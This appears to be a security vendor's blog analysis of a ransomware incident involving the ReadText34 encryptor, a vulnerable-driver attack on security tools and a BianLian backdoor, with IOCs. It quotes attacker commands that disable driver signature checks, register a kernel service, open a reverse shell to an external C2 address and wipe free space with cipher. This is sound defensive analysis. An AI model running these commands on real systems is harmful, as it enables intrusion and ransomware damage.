This is some text inside of a div block.
Glitch effect

ReadText34 Ransomware Incident

|
Contributors:
Glitch effectGlitch effectGlitch effect
Glitch banner

Background

Huntress analysts observe and block a wide variety of attacks on a weekly basis. Some of these attacks may be initial forays into the compromised infrastructure, attempts to launch ransomware, or even successful ransomware deployments.

During the second week of September 2024, a monitored endpoint triggered alerts for enabling RDP, multiple commands for disabling recovery of the system, and persistence for a ransomware executable. Shortly afterward (less than 20 minutes), the endpoint again triggered alerts, this time for modified ransomware canaries, indicating that files were encrypted. Visibility within the infrastructure was extremely limited, as the Huntress agent hadn't been completely deployed to all endpoints. As such, only the impacted endpoint could be more thoroughly investigated.

The Attack

The first indication of the attack was observed within the investigative timeline as the Administrator account credentials were used to access the [.highlight]C$[.highlight] share from an internal IP address. The threat actor then ran a remote command via [.highlight]reg.exe[.highlight] to enable RDP, as illustrated in Figure 1.

Figure 1: Command to enable RDP

The threat actor then attempted to log in via RDP; however, the first attempt failed, as they misspelled the account name as “[.highlight]adminitrator[.highlight]” (note the missing “s”). Over a minute and half later, they successfully logged in from a source endpoint with the workstation name [.highlight]HOME-PC[.highlight]

The threat actor then executed [.highlight]C:\Users\REDACTED\AppData\Roaming\trend micro\Trend.exe[.highlight]. A copy of this file was collected from the endpoint, and found to contain the string, [.highlight]F:\Users\admin\Downloads\TrueSightKiller-main\TrueSightKiller-main\x64\Release\TrueSightKiller.pdb[.highlight], indicating that it was likely used to install [.highlight]truesight.sys[.highlight], the TrueSight RogueKiller Antirootkit Driver. The embedded file version information within the driver appears as illustrated in Figure 2.

Figure 2: Truesight.sys file version information

[.highlight]Truesight.sys[.highlight] is known to be a vulnerable driver and is used in a number of bring-your-own-vulnerable-driver (“BYOVD”) attacks. For example, Huntress analysts have observed this vulnerable driver being leveraged during LukaLocker ransomware attacks. Immediately after the driver was installed, the security applications running on the endpoint (in this case, Trend Micro products) crashed, seen in the investigative timeline via System Event Log records.

In this incident, the installer EXE (named [.highlight]trend.exe[.highlight]) and driver had been placed in the [.highlight]C:\Users\REDACTED\AppData\Roaming\trend micro\[.highlight] folder, likely indicating that the threat actor had prior knowledge of security tools installed throughout the infrastructure. 

The next files to be executed were [.highlight]readtext34.exe[.highlight] and [.highlight]winppx.exe[.highlight], both found in the [.highlight]C:\Users\REDACTED\AppData\Roaming[.highlight] folder. When launched, the [.highlight]winppx.exe[.highlight] file proceeded to run the following commands:

[.highlight]bcdedit.exe  /set loadoptions DDISABLE_INTEGRITY_CHECKS[.highlight]
[.highlight]sc  create winppx binPath="C:\Windows\winppx.exe" type=kernel[.highlight]
[.highlight]start=boot error=normal tag=no DisplayName="winppx"[.highlight]

The first command, running [.highlight]bcdedit.exe[.highlight], is intended to disable the driver signature check prior to installing the kernel driver. However, records across the System, Security, and Application Event Log indicated that the [.highlight]winppx.exe[.highlight] failed to load. Those records appeared within the investigative timeline, all within the same second, as follows:

[.highlight]EVTX     REDACTED  - Service Control Manager/7000;winppx,%577[.highlight]
[.highlight]EVTX     REDACTED  - Service Control Manager/7045;[.highlight]
            [.highlight]winppx,C:\Windows\winppx.exe,kernel mode driver,boot start,[.highlight]
[.highlight]EVTX     REDACTED  - Microsoft-Windows-Security-Auditing/4658;[.highlight]
            [.highlight]S-1-5-21-4140347413-16511891-3320662292-500,Administrator,[.highlight]           
[.highlight]REDACTED,0x3ac505,Security,0x4bc,0x366c,[.highlight]
[.highlight]C:\Users\REDACTED\AppData\Roaming\winppx.exe[.highlight]
[.highlight]EVTX     REDACTED  - Application Popup/26;[.highlight]
            [.highlight],\SystemRoot\winppx.exe failed to load[.highlight]
[.highlight]EVTX     REDACTED  - Microsoft-Windows-Security-Auditing/5038;[.highlight]
            [.highlight]\Device\HarddiskVolume6\Windows\winppx.exe[.highlight]

The [.highlight]Microsoft-Windows-Security-Auditing/5038[.highlight] event record indicates that the image hash of the file was not valid. Even though the driver did not appear to load, the file did run the following command, launching what appears to be a reverse shell:

[.highlight]"svhost.exe"  -connect 94.198.50[.]195:25000 -pass Zz158df@jniow45h@ -recn 0 -rect 5[.highlight]

A search of VirusTotal for the IP address results in the banner illustrated in Figure 3.

Figure 3: VirusTotal banner for IP address

The Community section of the VirusTotal page includes multiple references to the IP address being the C2 address for the BianLian Go Trojan, which correlates to the anti-virus detection illustrated in Figure 4.

Figure 4: AV Detection for winppx.exe

It is interesting to note that launching the instance of [.highlight]winppx.exe[.highlight] apparently resulted in multiple persistence mechanisms, including copying the file to the Startup folder within the ProgramData directory, as well as attempting to install it as a kernel driver.

The first observed command run as a child process of [.highlight]readtext34.exe[.highlight] was the following:

[.highlight]cmd.exe /c rem Kill "SQL"[.highlight]

This is a clear indication of a batch file-style list of commands embedded within the executable. Following this command, a series of [.highlight]taskkill.exe[.highlight] commands were run, something often seen embedded within file encryption executables as a means of stopping running processes from inhibiting the file encryption process. As observed in this instance, very often, the list of processes stopped is independent of the processes actually executing on the endpoint. These were followed by a series of "[.highlight]net stop[.highlight]" commands to halt various Windows services, as well as commands intended to inhibit recovery by deleting Volume Shadow Copies and system backups. 

The [.highlight]readtext34.exe[.highlight] executable was also set up to persist via the compromised Administrator account’s Run key, as illustrated in Figure 5.

Figure 5: Encryptor File Persistence

Finally, the threat actor ran the following command:

[.highlight]readtext34.exe -network[.highlight]

This command then spawned the following child commands, launching a native Windows utility (LOLBin) to perform encryption:

[.highlight]cipher /w:\\?\X:[.highlight]
[.highlight]cipher /w:\\?\F:[.highlight]
[.highlight]cipher /w:\\?\I:[.highlight]
[.highlight]cipher /w:\\?\G:[.highlight]
[.highlight]cipher /w:\\?\H:[.highlight]
[.highlight]cipher /w:\\?\E:[.highlight]
[.highlight]cipher /w:\\?\B:[.highlight]
[.highlight]cipher /w:\\?\D:[.highlight]
[.highlight]cipher /w:\\?\C:[.highlight]
[.highlight]cipher /w:\\?\A:[.highlight]

The [.highlight]cipher.exe[.highlight] native Windows utility is a command line tool that administrators can use to manage encrypted data using the Encrypted File System. The “[.highlight]/w[.highlight]” option, from typing the command [.highlight]cipher /?[.highlight], has the effect illustrated in Figure 6.

Figure 6: Cipher.exe command syntax excerpt

In short, the use of the [.highlight]cipher.exe[.highlight] command does not encrypt files, but rather adds a layer of complexity to recovery by removing data from unallocated space within the volume. 

Following these commands, files were encrypted, which led to ransomware canaries triggering alerts. The ransom note, titled [.highlight]How_to_back_files.html[.highlight], indicates that the file encryption process utilized “RSA+AES”. The ransom note also includes a “personal ID” for the customer, email addresses to contact the threat actor, and the admonition that if contact is not made within 72 hours, the ransom price will increase. The ransom note also states that “highly confidential/personal data” was gathered and stored on a private server. Within the limits and confines of this investigation, there was no indication of data staging nor exfiltration commands, indicating that if they did occur, they occurred sometime prior to the investigated attack, and/or via endpoints that did not have the Huntress agent installed.

Conclusion

Cyber attacks can have a detrimental impact on organizations, in general, with ransomware attacks being not only devastating but also highly visible. As a result, organizations should strongly consider developing and regularly exercising incident response plans, as well as developing a thorough asset inventory and engaging in attack surface reduction efforts. Last but not least, endpoint monitoring efforts are most effective when all endpoints (servers and workstations) are included in the monitoring.

IOCs

Item SHA 256 / Description
HOME-PC threat actor’s workstation name
trend.exe 90daac69da7201e4e081b59b61ca2a2116772318621c430f75c91a65e56ea085
winppx.exe ac66828fbdf661d67562da5afb7cc8f55d9a8739ab1524e775d5dcebfc4de069
readtext34.exe 8368925651fefcd85e0e73790082b9a69237fa66225f932c2a44014cc356acdc
I:\locker\bin\stub_win_x64_encrypter.pdb PDB string in readtext34.exe
BabyLockerKZ Run key value used to persist readtext34.exe
readtext34 Encrypted file extension
How_to_back_files.html Ransom note name
ithelp15@securitymy[.]name , ithelp15@yousheltered[.]com Email contacts from ransom notes
Categories
Share

Sign Up for Blog Updates

Subscribe today and you’ll be the first to know when new content hits the blog.

By submitting this form, you accept our Privacy Policy
Huntress at work
Threat Analysis